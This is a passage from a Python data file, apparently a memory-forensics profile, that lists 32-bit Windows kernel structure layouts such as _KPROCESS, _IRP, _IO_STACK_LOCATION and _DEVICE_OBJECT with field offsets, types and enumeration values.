'AlpcContext' : [ 0x298, ['_ALPC_PROCESS_CONTEXT']],
'TimerResolutionLink' : [ 0x2a8, ['_LIST_ENTRY']],
'RequestedTimerResolution' : [ 0x2b0, ['unsigned long']],
'ActiveThreadsHighWatermark' : [ 0x2b4, ['unsigned long']],
'SmallestTimerResolution' : [ 0x2b8, ['unsigned long']],
'TimerResolutionStackRecord' : [ 0x2bc, ['pointer', ['_PO_DIAG_STACK_RECORD']]],
} ],
'_KPROCESS' : [ 0x98, {
'Header' : [ 0x0, ['_DISPATCHER_HEADER']],
'ProfileListHead' : [ 0x10, ['_LIST_ENTRY']],
'DirectoryTableBase' : [ 0x18, ['unsigned long']],
'LdtDescriptor' : [ 0x1c, ['_KGDTENTRY']],
'Int21Descriptor' : [ 0x24, ['_KIDTENTRY']],
'ThreadListHead' : [ 0x2c, ['_LIST_ENTRY']],
'ProcessLock' : [ 0x34, ['unsigned long']],
'Affinity' : [ 0x38, ['_KAFFINITY_EX']],
'ReadyListHead' : [ 0x44, ['_LIST_ENTRY']],
'SwapListEntry' : [ 0x4c, ['_SINGLE_LIST_ENTRY']],
'ActiveProcessors' : [ 0x50, ['_KAFFINITY_EX']],
'AutoAlignment' : [ 0x5c, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='long')]],
'DisableBoost' : [ 0x5c, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='long')]],
'DisableQuantum' : [ 0x5c, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='long')]],
'ActiveGroupsMask' : [ 0x5c, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'ReservedFlags' : [ 0x5c, ['BitField', dict(start_bit = 4, end_bit = 32, native_type='long')]],
'ProcessFlags' : [ 0x5c, ['long']],
'BasePriority' : [ 0x60, ['unsigned char']],
'QuantumReset' : [ 0x61, ['unsigned char']],
'Visited' : [ 0x62, ['unsigned char']],
'Unused3' : [ 0x63, ['unsigned char']],
'ThreadSeed' : [ 0x64, ['array', 1, ['unsigned long']]],
'IdealNode' : [ 0x68, ['array', 1, ['unsigned short']]],
'IdealGlobalNode' : [ 0x6a, ['unsigned short']],
'Flags' : [ 0x6c, ['_KEXECUTE_OPTIONS']],
'Unused1' : [ 0x6d, ['unsigned char']],
'IopmOffset' : [ 0x6e, ['unsigned short']],
'Unused4' : [ 0x70, ['unsigned long']],
'StackCount' : [ 0x74, ['_KSTACK_COUNT']],
'ProcessListEntry' : [ 0x78, ['_LIST_ENTRY']],
'CycleTime' : [ 0x80, ['unsigned long long']],
'KernelTime' : [ 0x88, ['unsigned long']],
'UserTime' : [ 0x8c, ['unsigned long']],
'VdmTrapcHandler' : [ 0x90, ['pointer', ['void']]],
} ],
'__unnamed_1291' : [ 0x2c, {
'InitialPrivilegeSet' : [ 0x0, ['_INITIAL_PRIVILEGE_SET']],
'PrivilegeSet' : [ 0x0, ['_PRIVILEGE_SET']],
} ],
'_ACCESS_STATE' : [ 0x74, {
'OperationID' : [ 0x0, ['_LUID']],
'SecurityEvaluated' : [ 0x8, ['unsigned char']],
'GenerateAudit' : [ 0x9, ['unsigned char']],
'GenerateOnClose' : [ 0xa, ['unsigned char']],
'PrivilegesAllocated' : [ 0xb, ['unsigned char']],
'Flags' : [ 0xc, ['unsigned long']],
'RemainingDesiredAccess' : [ 0x10, ['unsigned long']],
'PreviouslyGrantedAccess' : [ 0x14, ['unsigned long']],
'OriginalDesiredAccess' : [ 0x18, ['unsigned long']],
'SubjectSecurityContext' : [ 0x1c, ['_SECURITY_SUBJECT_CONTEXT']],
'SecurityDescriptor' : [ 0x2c, ['pointer', ['void']]],
'AuxData' : [ 0x30, ['pointer', ['void']]],
'Privileges' : [ 0x34, ['__unnamed_1291']],
'AuditPrivileges' : [ 0x60, ['unsigned char']],
'ObjectName' : [ 0x64, ['_UNICODE_STRING']],
'ObjectTypeName' : [ 0x6c, ['_UNICODE_STRING']],
} ],
'_AUX_ACCESS_DATA' : [ 0xc0, {
'PrivilegesUsed' : [ 0x0, ['pointer', ['_PRIVILEGE_SET']]],
'GenericMapping' : [ 0x4, ['_GENERIC_MAPPING']],
'AccessesToAudit' : [ 0x14, ['unsigned long']],
'MaximumAuditMask' : [ 0x18, ['unsigned long']],
'TransactionId' : [ 0x1c, ['_GUID']],
'NewSecurityDescriptor' : [ 0x2c, ['pointer', ['void']]],
'ExistingSecurityDescriptor' : [ 0x30, ['pointer', ['void']]],
'ParentSecurityDescriptor' : [ 0x34, ['pointer', ['void']]],
'DeRefSecurityDescriptor' : [ 0x38, ['pointer', ['void']]],
'SDLock' : [ 0x3c, ['pointer', ['void']]],
'AccessReasons' : [ 0x40, ['_ACCESS_REASONS']],
} ],
'__unnamed_12a0' : [ 0x4, {
'MasterIrp' : [ 0x0, ['pointer', ['_IRP']]],
'IrpCount' : [ 0x0, ['long']],
'SystemBuffer' : [ 0x0, ['pointer', ['void']]],
} ],
'__unnamed_12a5' : [ 0x8, {
'UserApcRoutine' : [ 0x0, ['pointer', ['void']]],
'IssuingProcess' : [ 0x0, ['pointer', ['void']]],
'UserApcContext' : [ 0x4, ['pointer', ['void']]],
} ],
'__unnamed_12a7' : [ 0x8, {
'AsynchronousParameters' : [ 0x0, ['__unnamed_12a5']],
'AllocationSize' : [ 0x0, ['_LARGE_INTEGER']],
} ],
'__unnamed_12b2' : [ 0x28, {
'DeviceQueueEntry' : [ 0x0, ['_KDEVICE_QUEUE_ENTRY']],
'DriverContext' : [ 0x0, ['array', 4, ['pointer', ['void']]]],
'Thread' : [ 0x10, ['pointer', ['_ETHREAD']]],
'AuxiliaryBuffer' : [ 0x14, ['pointer', ['unsigned char']]],
'ListEntry' : [ 0x18, ['_LIST_ENTRY']],
'CurrentStackLocation' : [ 0x20, ['pointer', ['_IO_STACK_LOCATION']]],
'PacketType' : [ 0x20, ['unsigned long']],
'OriginalFileObject' : [ 0x24, ['pointer', ['_FILE_OBJECT']]],
} ],
'__unnamed_12b4' : [ 0x30, {
'Overlay' : [ 0x0, ['__unnamed_12b2']],
'Apc' : [ 0x0, ['_KAPC']],
'CompletionKey' : [ 0x0, ['pointer', ['void']]],
} ],
'_IRP' : [ 0x70, {
'Type' : [ 0x0, ['short']],
'Size' : [ 0x2, ['unsigned short']],
'MdlAddress' : [ 0x4, ['pointer', ['_MDL']]],
'Flags' : [ 0x8, ['unsigned long']],
'AssociatedIrp' : [ 0xc, ['__unnamed_12a0']],
'ThreadListEntry' : [ 0x10, ['_LIST_ENTRY']],
'IoStatus' : [ 0x18, ['_IO_STATUS_BLOCK']],
'RequestorMode' : [ 0x20, ['unsigned char']],
'PendingReturned' : [ 0x21, ['unsigned char']],
'StackCount' : [ 0x22, ['unsigned char']],
'CurrentLocation' : [ 0x23, ['unsigned char']],
'Cancel' : [ 0x24, ['unsigned char']],
'CancelIrql' : [ 0x25, ['unsigned char']],
'ApcEnvironment' : [ 0x26, ['unsigned char']],
'AllocationFlags' : [ 0x27, ['unsigned char']],
'UserIosb' : [ 0x28, ['pointer', ['_IO_STATUS_BLOCK']]],
'UserEvent' : [ 0x2c, ['pointer', ['_KEVENT']]],
'Overlay' : [ 0x30, ['__unnamed_12a7']],
'CancelRoutine' : [ 0x38, ['pointer', ['void']]],
'UserBuffer' : [ 0x3c, ['pointer', ['void']]],
'Tail' : [ 0x40, ['__unnamed_12b4']],
} ],
'__unnamed_12bb' : [ 0x10, {
'SecurityContext' : [ 0x0, ['pointer', ['_IO_SECURITY_CONTEXT']]],
'Options' : [ 0x4, ['unsigned long']],
'FileAttributes' : [ 0x8, ['unsigned short']],
'ShareAccess' : [ 0xa, ['unsigned short']],
'EaLength' : [ 0xc, ['unsigned long']],
} ],
'__unnamed_12bf' : [ 0x10, {
'SecurityContext' : [ 0x0, ['pointer', ['_IO_SECURITY_CONTEXT']]],
'Options' : [ 0x4, ['unsigned long']],
'Reserved' : [ 0x8, ['unsigned short']],
'ShareAccess' : [ 0xa, ['unsigned short']],
'Parameters' : [ 0xc, ['pointer', ['_NAMED_PIPE_CREATE_PARAMETERS']]],
} ],
'__unnamed_12c3' : [ 0x10, {
'SecurityContext' : [ 0x0, ['pointer', ['_IO_SECURITY_CONTEXT']]],
'Options' : [ 0x4, ['unsigned long']],
'Reserved' : [ 0x8, ['unsigned short']],
'ShareAccess' : [ 0xa, ['unsigned short']],
'Parameters' : [ 0xc, ['pointer', ['_MAILSLOT_CREATE_PARAMETERS']]],
} ],
'__unnamed_12c5' : [ 0x10, {
'Length' : [ 0x0, ['unsigned long']],
'Key' : [ 0x4, ['unsigned long']],
'ByteOffset' : [ 0x8, ['_LARGE_INTEGER']],
} ],
'__unnamed_12c9' : [ 0x10, {
'Length' : [ 0x0, ['unsigned long']],
'FileName' : [ 0x4, ['pointer', ['_UNICODE_STRING']]],
'FileInformationClass' : [ 0x8, ['Enumeration', dict(target = 'long', choices = {1: 'FileDirectoryInformation', 2: 'FileFullDirectoryInformation', 3: 'FileBothDirectoryInformation', 4: 'FileBasicInformation', 5: 'FileStandardInformation', 6: 'FileInternalInformation', 7: 'FileEaInformation', 8: 'FileAccessInformation', 9: 'FileNameInformation', 10: 'FileRenameInformation', 11: 'FileLinkInformation', 12: 'FileNamesInformation', 13: 'FileDispositionInformation', 14: 'FilePositionInformation', 15: 'FileFullEaInformation', 16: 'FileModeInformation', 17: 'FileAlignmentInformation', 18: 'FileAllInformation', 19: 'FileAllocationInformation', 20: 'FileEndOfFileInformation', 21: 'FileAlternateNameInformation', 22: 'FileStreamInformation', 23: 'FilePipeInformation', 24: 'FilePipeLocalInformation', 25: 'FilePipeRemoteInformation', 26: 'FileMailslotQueryInformation', 27: 'FileMailslotSetInformation', 28: 'FileCompressionInformation', 29: 'FileObjectIdInformation', 30: 'FileCompletionInformation', 31: 'FileMoveClusterInformation', 32: 'FileQuotaInformation', 33: 'FileReparsePointInformation', 34: 'FileNetworkOpenInformation', 35: 'FileAttributeTagInformation', 36: 'FileTrackingInformation', 37: 'FileIdBothDirectoryInformation', 38: 'FileIdFullDirectoryInformation', 39: 'FileValidDataLengthInformation', 40: 'FileShortNameInformation', 41: 'FileIoCompletionNotificationInformation', 42: 'FileIoStatusBlockRangeInformation', 43: 'FileIoPriorityHintInformation', 44: 'FileSfioReserveInformation', 45: 'FileSfioVolumeInformation', 46: 'FileHardLinkInformation', 47: 'FileProcessIdsUsingFileInformation', 48: 'FileNormalizedNameInformation', 49: 'FileNetworkPhysicalNameInformation', 50: 'FileIdGlobalTxDirectoryInformation', 51: 'FileIsRemoteDeviceInformation', 52: 'FileAttributeCacheInformation', 53: 'FileNumaNodeInformation', 54: 'FileStandardLinkInformation', 55: 'FileRemoteProtocolInformation', 56: 'FileMaximumInformation'})]],
'FileIndex' : [ 0xc, ['unsigned long']],
} ],
'__unnamed_12cb' : [ 0x8, {
'Length' : [ 0x0, ['unsigned long']],
'CompletionFilter' : [ 0x4, ['unsigned long']],
} ],
'__unnamed_12cd' : [ 0x8, {
'Length' : [ 0x0, ['unsigned long']],
'FileInformationClass' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {1: 'FileDirectoryInformation', 2: 'FileFullDirectoryInformation', 3: 'FileBothDirectoryInformation', 4: 'FileBasicInformation', 5: 'FileStandardInformation', 6: 'FileInternalInformation', 7: 'FileEaInformation', 8: 'FileAccessInformation', 9: 'FileNameInformation', 10: 'FileRenameInformation', 11: 'FileLinkInformation', 12: 'FileNamesInformation', 13: 'FileDispositionInformation', 14: 'FilePositionInformation', 15: 'FileFullEaInformation', 16: 'FileModeInformation', 17: 'FileAlignmentInformation', 18: 'FileAllInformation', 19: 'FileAllocationInformation', 20: 'FileEndOfFileInformation', 21: 'FileAlternateNameInformation', 22: 'FileStreamInformation', 23: 'FilePipeInformation', 24: 'FilePipeLocalInformation', 25: 'FilePipeRemoteInformation', 26: 'FileMailslotQueryInformation', 27: 'FileMailslotSetInformation', 28: 'FileCompressionInformation', 29: 'FileObjectIdInformation', 30: 'FileCompletionInformation', 31: 'FileMoveClusterInformation', 32: 'FileQuotaInformation', 33: 'FileReparsePointInformation', 34: 'FileNetworkOpenInformation', 35: 'FileAttributeTagInformation', 36: 'FileTrackingInformation', 37: 'FileIdBothDirectoryInformation', 38: 'FileIdFullDirectoryInformation', 39: 'FileValidDataLengthInformation', 40: 'FileShortNameInformation', 41: 'FileIoCompletionNotificationInformation', 42: 'FileIoStatusBlockRangeInformation', 43: 'FileIoPriorityHintInformation', 44: 'FileSfioReserveInformation', 45: 'FileSfioVolumeInformation', 46: 'FileHardLinkInformation', 47: 'FileProcessIdsUsingFileInformation', 48: 'FileNormalizedNameInformation', 49: 'FileNetworkPhysicalNameInformation', 50: 'FileIdGlobalTxDirectoryInformation', 51: 'FileIsRemoteDeviceInformation', 52: 'FileAttributeCacheInformation', 53: 'FileNumaNodeInformation', 54: 'FileStandardLinkInformation', 55: 'FileRemoteProtocolInformation', 56: 'FileMaximumInformation'})]],
} ],
'__unnamed_12cf' : [ 0x10, {
'Length' : [ 0x0, ['unsigned long']],
'FileInformationClass' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {1: 'FileDirectoryInformation', 2: 'FileFullDirectoryInformation', 3: 'FileBothDirectoryInformation', 4: 'FileBasicInformation', 5: 'FileStandardInformation', 6: 'FileInternalInformation', 7: 'FileEaInformation', 8: 'FileAccessInformation', 9: 'FileNameInformation', 10: 'FileRenameInformation', 11: 'FileLinkInformation', 12: 'FileNamesInformation', 13: 'FileDispositionInformation', 14: 'FilePositionInformation', 15: 'FileFullEaInformation', 16: 'FileModeInformation', 17: 'FileAlignmentInformation', 18: 'FileAllInformation', 19: 'FileAllocationInformation', 20: 'FileEndOfFileInformation', 21: 'FileAlternateNameInformation', 22: 'FileStreamInformation', 23: 'FilePipeInformation', 24: 'FilePipeLocalInformation', 25: 'FilePipeRemoteInformation', 26: 'FileMailslotQueryInformation', 27: 'FileMailslotSetInformation', 28: 'FileCompressionInformation', 29: 'FileObjectIdInformation', 30: 'FileCompletionInformation', 31: 'FileMoveClusterInformation', 32: 'FileQuotaInformation', 33: 'FileReparsePointInformation', 34: 'FileNetworkOpenInformation', 35: 'FileAttributeTagInformation', 36: 'FileTrackingInformation', 37: 'FileIdBothDirectoryInformation', 38: 'FileIdFullDirectoryInformation', 39: 'FileValidDataLengthInformation', 40: 'FileShortNameInformation', 41: 'FileIoCompletionNotificationInformation', 42: 'FileIoStatusBlockRangeInformation', 43: 'FileIoPriorityHintInformation', 44: 'FileSfioReserveInformation', 45: 'FileSfioVolumeInformation', 46: 'FileHardLinkInformation', 47: 'FileProcessIdsUsingFileInformation', 48: 'FileNormalizedNameInformation', 49: 'FileNetworkPhysicalNameInformation', 50: 'FileIdGlobalTxDirectoryInformation', 51: 'FileIsRemoteDeviceInformation', 52: 'FileAttributeCacheInformation', 53: 'FileNumaNodeInformation', 54: 'FileStandardLinkInformation', 55: 'FileRemoteProtocolInformation', 56: 'FileMaximumInformation'})]],
'FileObject' : [ 0x8, ['pointer', ['_FILE_OBJECT']]],
'ReplaceIfExists' : [ 0xc, ['unsigned char']],
'AdvanceOnly' : [ 0xd, ['unsigned char']],
'ClusterCount' : [ 0xc, ['unsigned long']],
'DeleteHandle' : [ 0xc, ['pointer', ['void']]],
} ],
'__unnamed_12d1' : [ 0x10, {
'Length' : [ 0x0, ['unsigned long']],
'EaList' : [ 0x4, ['pointer', ['void']]],
'EaListLength' : [ 0x8, ['unsigned long']],
'EaIndex' : [ 0xc, ['unsigned long']],
} ],
'__unnamed_12d3' : [ 0x4, {
'Length' : [ 0x0, ['unsigned long']],
} ],
'__unnamed_12d7' : [ 0x8, {
'Length' : [ 0x0, ['unsigned long']],
'FsInformationClass' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {1: 'FileFsVolumeInformation', 2: 'FileFsLabelInformation', 3: 'FileFsSizeInformation', 4: 'FileFsDeviceInformation', 5: 'FileFsAttributeInformation', 6: 'FileFsControlInformation', 7: 'FileFsFullSizeInformation', 8: 'FileFsObjectIdInformation', 9: 'FileFsDriverPathInformation', 10: 'FileFsVolumeFlagsInformation', 11: 'FileFsMaximumInformation'})]],
} ],
'__unnamed_12d9' : [ 0x10, {
'OutputBufferLength' : [ 0x0, ['unsigned long']],
'InputBufferLength' : [ 0x4, ['unsigned long']],
'FsControlCode' : [ 0x8, ['unsigned long']],
'Type3InputBuffer' : [ 0xc, ['pointer', ['void']]],
} ],
'__unnamed_12dc' : [ 0x10, {
'Length' : [ 0x0, ['pointer', ['_LARGE_INTEGER']]],
'Key' : [ 0x4, ['unsigned long']],
'ByteOffset' : [ 0x8, ['_LARGE_INTEGER']],
} ],
'__unnamed_12de' : [ 0x10, {
'OutputBufferLength' : [ 0x0, ['unsigned long']],
'InputBufferLength' : [ 0x4, ['unsigned long']],
'IoControlCode' : [ 0x8, ['unsigned long']],
'Type3InputBuffer' : [ 0xc, ['pointer', ['void']]],
} ],
'__unnamed_12e0' : [ 0x8, {
'SecurityInformation' : [ 0x0, ['unsigned long']],
'Length' : [ 0x4, ['unsigned long']],
} ],
'__unnamed_12e2' : [ 0x8, {
'SecurityInformation' : [ 0x0, ['unsigned long']],
'SecurityDescriptor' : [ 0x4, ['pointer', ['void']]],
} ],
'__unnamed_12e6' : [ 0x8, {
'Vpb' : [ 0x0, ['pointer', ['_VPB']]],
'DeviceObject' : [ 0x4, ['pointer', ['_DEVICE_OBJECT']]],
} ],
'__unnamed_12ea' : [ 0x4, {
'Srb' : [ 0x0, ['pointer', ['_SCSI_REQUEST_BLOCK']]],
} ],
'__unnamed_12ee' : [ 0x10, {
'Length' : [ 0x0, ['unsigned long']],
'StartSid' : [ 0x4, ['pointer', ['void']]],
'SidList' : [ 0x8, ['pointer', ['_FILE_GET_QUOTA_INFORMATION']]],
'SidListLength' : [ 0xc, ['unsigned long']],
} ],
'__unnamed_12f2' : [ 0x4, {
'Type' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'BusRelations', 1: 'EjectionRelations', 2: 'PowerRelations', 3: 'RemovalRelations', 4: 'TargetDeviceRelation', 5: 'SingleBusRelations', 6: 'TransportRelations'})]],
} ],
'__unnamed_12f8' : [ 0x10, {
'InterfaceType' : [ 0x0, ['pointer', ['_GUID']]],
'Size' : [ 0x4, ['unsigned short']],
'Version' : [ 0x6, ['unsigned short']],
'Interface' : [ 0x8, ['pointer', ['_INTERFACE']]],
'InterfaceSpecificData' : [ 0xc, ['pointer', ['void']]],
} ],
'__unnamed_12fc' : [ 0x4, {
'Capabilities' : [ 0x0, ['pointer', ['_DEVICE_CAPABILITIES']]],
} ],
'__unnamed_1300' : [ 0x4, {
'IoResourceRequirementList' : [ 0x0, ['pointer', ['_IO_RESOURCE_REQUIREMENTS_LIST']]],
} ],
'__unnamed_1302' : [ 0x10, {
'WhichSpace' : [ 0x0, ['unsigned long']],
'Buffer' : [ 0x4, ['pointer', ['void']]],
'Offset' : [ 0x8, ['unsigned long']],
'Length' : [ 0xc, ['unsigned long']],
} ],
'__unnamed_1304' : [ 0x1, {
'Lock' : [ 0x0, ['unsigned char']],
} ],
'__unnamed_1308' : [ 0x4, {
'IdType' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'BusQueryDeviceID', 1: 'BusQueryHardwareIDs', 2: 'BusQueryCompatibleIDs', 3: 'BusQueryInstanceID', 4: 'BusQueryDeviceSerialNumber', 5: 'BusQueryContainerID'})]],
} ],
'__unnamed_130c' : [ 0x8, {
'DeviceTextType' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'DeviceTextDescription', 1: 'DeviceTextLocationInformation'})]],
'LocaleId' : [ 0x4, ['unsigned long']],
} ],
'__unnamed_1310' : [ 0x8, {
'InPath' : [ 0x0, ['unsigned char']],
'Reserved' : [ 0x1, ['array', 3, ['unsigned char']]],
'Type' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'DeviceUsageTypeUndefined', 1: 'DeviceUsageTypePaging', 2: 'DeviceUsageTypeHibernation', 3: 'DeviceUsageTypeDumpFile'})]],
} ],
'__unnamed_1314' : [ 0x4, {
'PowerState' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
} ],
'__unnamed_1318' : [ 0x4, {
'PowerSequence' : [ 0x0, ['pointer', ['_POWER_SEQUENCE']]],
} ],
'__unnamed_1320' : [ 0x10, {
'SystemContext' : [ 0x0, ['unsigned long']],
'SystemPowerStateContext' : [ 0x0, ['_SYSTEM_POWER_STATE_CONTEXT']],
'Type' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'SystemPowerState', 1: 'DevicePowerState'})]],
'State' : [ 0x8, ['_POWER_STATE']],
'ShutdownType' : [ 0xc, ['Enumeration', dict(target = 'long', choices = {0: 'PowerActionNone', 1: 'PowerActionReserved', 2: 'PowerActionSleep', 3: 'PowerActionHibernate', 4: 'PowerActionShutdown', 5: 'PowerActionShutdownReset', 6: 'PowerActionShutdownOff', 7: 'PowerActionWarmEject'})]],
} ],
'__unnamed_1324' : [ 0x8, {
'AllocatedResources' : [ 0x0, ['pointer', ['_CM_RESOURCE_LIST']]],
'AllocatedResourcesTranslated' : [ 0x4, ['pointer', ['_CM_RESOURCE_LIST']]],
} ],
'__unnamed_1326' : [ 0x10, {
'ProviderId' : [ 0x0, ['unsigned long']],
'DataPath' : [ 0x4, ['pointer', ['void']]],
'BufferSize' : [ 0x8, ['unsigned long']],
'Buffer' : [ 0xc, ['pointer', ['void']]],
} ],
'__unnamed_1328' : [ 0x10, {
'Argument1' : [ 0x0, ['pointer', ['void']]],
'Argument2' : [ 0x4, ['pointer', ['void']]],
'Argument3' : [ 0x8, ['pointer', ['void']]],
'Argument4' : [ 0xc, ['pointer', ['void']]],
} ],
'__unnamed_132a' : [ 0x10, {
'Create' : [ 0x0, ['__unnamed_12bb']],
'CreatePipe' : [ 0x0, ['__unnamed_12bf']],
'CreateMailslot' : [ 0x0, ['__unnamed_12c3']],
'Read' : [ 0x0, ['__unnamed_12c5']],
'Write' : [ 0x0, ['__unnamed_12c5']],
'QueryDirectory' : [ 0x0, ['__unnamed_12c9']],
'NotifyDirectory' : [ 0x0, ['__unnamed_12cb']],
'QueryFile' : [ 0x0, ['__unnamed_12cd']],
'SetFile' : [ 0x0, ['__unnamed_12cf']],
'QueryEa' : [ 0x0, ['__unnamed_12d1']],
'SetEa' : [ 0x0, ['__unnamed_12d3']],
'QueryVolume' : [ 0x0, ['__unnamed_12d7']],
'SetVolume' : [ 0x0, ['__unnamed_12d7']],
'FileSystemControl' : [ 0x0, ['__unnamed_12d9']],
'LockControl' : [ 0x0, ['__unnamed_12dc']],
'DeviceIoControl' : [ 0x0, ['__unnamed_12de']],
'QuerySecurity' : [ 0x0, ['__unnamed_12e0']],
'SetSecurity' : [ 0x0, ['__unnamed_12e2']],
'MountVolume' : [ 0x0, ['__unnamed_12e6']],
'VerifyVolume' : [ 0x0, ['__unnamed_12e6']],
'Scsi' : [ 0x0, ['__unnamed_12ea']],
'QueryQuota' : [ 0x0, ['__unnamed_12ee']],
'SetQuota' : [ 0x0, ['__unnamed_12d3']],
'QueryDeviceRelations' : [ 0x0, ['__unnamed_12f2']],
'QueryInterface' : [ 0x0, ['__unnamed_12f8']],
'DeviceCapabilities' : [ 0x0, ['__unnamed_12fc']],
'FilterResourceRequirements' : [ 0x0, ['__unnamed_1300']],
'ReadWriteConfig' : [ 0x0, ['__unnamed_1302']],
'SetLock' : [ 0x0, ['__unnamed_1304']],
'QueryId' : [ 0x0, ['__unnamed_1308']],
'QueryDeviceText' : [ 0x0, ['__unnamed_130c']],
'UsageNotification' : [ 0x0, ['__unnamed_1310']],
'WaitWake' : [ 0x0, ['__unnamed_1314']],
'PowerSequence' : [ 0x0, ['__unnamed_1318']],
'Power' : [ 0x0, ['__unnamed_1320']],
'StartDevice' : [ 0x0, ['__unnamed_1324']],
'WMI' : [ 0x0, ['__unnamed_1326']],
'Others' : [ 0x0, ['__unnamed_1328']],
} ],
'_IO_STACK_LOCATION' : [ 0x24, {
'MajorFunction' : [ 0x0, ['unsigned char']],
'MinorFunction' : [ 0x1, ['unsigned char']],
'Flags' : [ 0x2, ['unsigned char']],
'Control' : [ 0x3, ['unsigned char']],
'Parameters' : [ 0x4, ['__unnamed_132a']],
'DeviceObject' : [ 0x14, ['pointer', ['_DEVICE_OBJECT']]],
'FileObject' : [ 0x18, ['pointer', ['_FILE_OBJECT']]],
'CompletionRoutine' : [ 0x1c, ['pointer', ['void']]],
'Context' : [ 0x20, ['pointer', ['void']]],
} ],
'__unnamed_1340' : [ 0x28, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'Wcb' : [ 0x0, ['_WAIT_CONTEXT_BLOCK']],
} ],
'_DEVICE_OBJECT' : [ 0xb8, {
'Type' : [ 0x0, ['short']],
'Size' : [ 0x2, ['unsigned short']],
'ReferenceCount' : [ 0x4, ['long']],
'DriverObject' : [ 0x8, ['pointer', ['_DRIVER_OBJECT']]],
'NextDevice' : [ 0xc, ['pointer', ['_DEVICE_OBJECT']]],
'AttachedDevice' : [ 0x10, ['pointer', ['_DEVICE_OBJECT']]],
'CurrentIrp' : [ 0x14, ['pointer', ['_IRP']]],
'Timer' : [ 0x18, ['pointer', ['_IO_TIMER']]],
'Flags' : [ 0x1c, ['unsigned long']],
'Characteristics' : [ 0x20, ['unsigned long']],
'Vpb' : [ 0x24, ['pointer', ['_VPB']]],
'DeviceExtension' : [ 0x28, ['pointer', ['void']]],
'DeviceType' : [ 0x2c, ['unsigned long']],
'StackSize' : [ 0x30, ['unsigned char']],
'Queue' : [ 0x34, ['__unnamed_1340']],
'AlignmentRequirement' : [ 0x5c, ['unsigned long']],
'DeviceQueue' : [ 0x60, ['_KDEVICE_QUEUE']],
'Dpc' : [ 0x74, ['_KDPC']],
'ActiveThreadCount' : [ 0x94, ['unsigned long']],
'SecurityDescriptor' : [ 0x98, ['pointer', ['void']]],
'DeviceLock' : [ 0x9c, ['_KEVENT']],
'SectorSize' : [ 0xac, ['unsigned short']],
'Spare1' : [ 0xae, ['unsigned short']],
'DeviceObjectExtension' : [ 0xb0, ['pointer', ['_DEVOBJ_EXTENSION']]],
'Reserved' : [ 0xb4, ['pointer', ['void']]],
} ],
'_KDPC' : [ 0x20, {
'Type' : [ 0x0, ['unsigned char']],
'Importance' : [ 0x1, ['unsigned char']],
'Number' : [ 0x2, ['unsigned short']],
'DpcListEntry' : [ 0x4, ['_LIST_ENTRY']],
'DeferredRoutine' : [ 0xc, ['pointer', ['void']]],
'DeferredContext' : [ 0x10, ['pointer', ['void']]],
'SystemArgument1' : [ 0x14, ['pointer', ['void']]],
'SystemArgument2' : [ 0x18, ['pointer', ['void']]],
'DpcData' : [ 0x1c, ['pointer', ['void']]],
} ],
'_IO_DRIVER_CREATE_CONTEXT' : [ 0x10, {
'Size' : [ 0x0, ['short']],
'ExtraCreateParameter' : [ 0x4, ['pointer', ['_ECP_LIST']]],
'DeviceObjectHint' : [ 0x8, ['pointer', ['void']]],
'TxnParameters' : [ 0xc, ['pointer', ['_TXN_PARAMETER_BLOCK']]],
} ],
'_IO_PRIORITY_INFO' : [ 0x10, {
'Size' : [ 0x0, ['unsigned long']],
'ThreadPriority' : [ 0x4, ['unsigned long']],
'PagePriority' : [ 0x8, ['unsigned long']],
'IoPriority' : [ 0xc, ['Enumeration', dict(target = 'long', choices = {0: 'IoPriorityVeryLow', 1: 'IoPriorityLow', 2: 'IoPriorityNormal', 3: 'IoPriorityHigh', 4: 'IoPriorityCritical', 5: 'MaxIoPriorityTypes'})]],
} ],
'_OBJECT_ATTRIBUTES' : [ 0x18, {
'Length' : [ 0x0, ['unsigned long']],
'RootDirectory' : [ 0x4, ['pointer', ['void']]],
'ObjectName' : [ 0x8, ['pointer', ['_UNICODE_STRING']]],
'Attributes' : [ 0xc, ['unsigned long']],
'SecurityDescriptor' : [ 0x10, ['pointer', ['void']]],
'SecurityQualityOfService' : [ 0x14, ['pointer', ['void']]],
} ],
'_OBJECT_HANDLE_INFORMATION' : [ 0x8, {
'HandleAttributes' : [ 0x0, ['unsigned long']],
'GrantedAccess' : [ 0x4, ['unsigned long']],
} ],
'_EVENT_DATA_DESCRIPTOR' : [ 0x10, {
'Ptr' : [ 0x0, ['unsigned long long']],
'Size' : [ 0x8, ['unsigned long']],
'Reserved' : [ 0xc, ['unsigned long']],
} ],
'_EVENT_DESCRIPTOR' : [ 0x10, {
'Id' : [ 0x0, ['unsigned short']],
'Version' : [ 0x2, ['unsigned char']],
'Channel' : [ 0x3, ['unsigned char']],
'Level' : [ 0x4, ['unsigned char']],
'Opcode' : [ 0x5, ['unsigned char']],
'Task' : [ 0x6, ['unsigned short']],
'Keyword' : [ 0x8, ['unsigned long long']],
} ],
'_PERFINFO_GROUPMASK' : [ 0x20, {
'Masks' : [ 0x0, ['array', 8, ['unsigned long']]],
} ],
'_FILE_OBJECT' : [ 0x80, {
'Type' : [ 0x0, ['short']],
'Size' : [ 0x2, ['short']],
'DeviceObject' : [ 0x4, ['pointer', ['_DEVICE_OBJECT']]],
'Vpb' : [ 0x8, ['pointer', ['_VPB']]],
'FsContext' : [ 0xc, ['pointer', ['void']]],
'FsContext2' : [ 0x10, ['pointer', ['void']]],
'SectionObjectPointer' : [ 0x14, ['pointer', ['_SECTION_OBJECT_POINTERS']]],
'PrivateCacheMap' : [ 0x18, ['pointer', ['void']]],
'FinalStatus' : [ 0x1c, ['long']],
